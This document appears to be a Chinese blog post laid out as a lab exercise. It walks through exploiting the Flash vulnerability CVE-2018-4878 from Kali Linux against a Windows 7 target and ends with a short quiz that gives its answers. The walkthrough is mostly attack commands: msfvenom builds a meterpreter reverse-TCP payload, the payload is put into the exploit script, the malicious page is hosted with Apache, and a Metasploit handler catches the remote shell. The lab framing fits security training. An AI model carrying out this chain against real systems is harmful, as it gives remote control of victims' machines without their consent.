-->
当前位置:首页 > 实验 > 正文内容

CVE-2018-4878 Flash 漏洞 实验

Luz3年前 (2020-12-21)实验2420

实验目的

  • 由于Flash存在CVE-2018-4878这个高危漏洞,导致Windows靶机访问含flash的页面时,直接被Kali Linux控制。

     

    实验原理

  • 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被"远程代码执行",并且直接被getshell。

     

    实验环境

    1.操作系统
      操作机:kali
      目标机:windows7


    实验步骤

    步骤1:使用msfvenom生成shell代码

      1.1.生成代码,其中lhost为kali的ip地址,lport为自定义的端口号

    msfvenom -p windows/meterpreter/reverse_tcp lhost=10.143.0.30 lport=8888 -f python>/root/shellcode.txt

     

    图1

      1.2.查看代码

    cat /root/shellcode.txt

     

    图2

      1.3.在/root/CVE-2018-4878-master目录,gedit编辑CVE-2018-2878.py,将上面msfvenom生成的代码覆盖原来的代码

     

    图3

      1.4. 修改CVE-2018-4878.py下面的文件信息(后面会用到,之后保存修改退出):

     

    图4

      1.5.进入CVE-2018-4878-master路径,用Python执行CVE-2018-4878.py代码

     

    图5

      1.6.kali linux 开启Apache2服务,并将上面生成的2个文件放入/var/www/html目录中

     

    图6

    此时,Kali Linux上Web服务启动,并且具备index2.html这个页面。只要靶机启用flash并访问了这个页面,则可以直接被控制。

    实验步骤

    步骤2:开启监听并控制

      2.1.开启会话进行监听

    msfconsole           启动msf

    use exploit/multi/handler            使用handler监听模块

    set payload windows/meterpreter/reverse_tcp                  设置一个tcp回弹连接

    set LHOST 10.143.0.30                            设置kali渗透机的ip地址

    set LPORT 8888                                       设置监听端口,这个需跟上面msfvenom设置的端口一致

    exploit                                  开启监听等待上线

     

    图7

      2.2.切到目标机安装flash插件选择不更新

     

    图8

      2.3.使用Win 7内置的IE 8浏览器访问页面10.143.0.30/index2.html

     

    图9

      2.4.查看操作机已经获取meterpreter shell,并进行管理,可以看到目标机已经成功的被操作机控制。

     

    图10

     

     

    图11

     

     

    图12

    综合测验

    【题目概览】

    共计3题

    单选题共计0题

    多选题共计0题

    填空题共计3题

    1【填空题】图11遮挡处为x86

    【正确答案】:x86

    2【填空题】图12遮挡处为Desktop

    【正确答案】:Desktop

    3【填空题】如何启动apache服务?service apache2 start

    【正确答案】:apache2

     

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。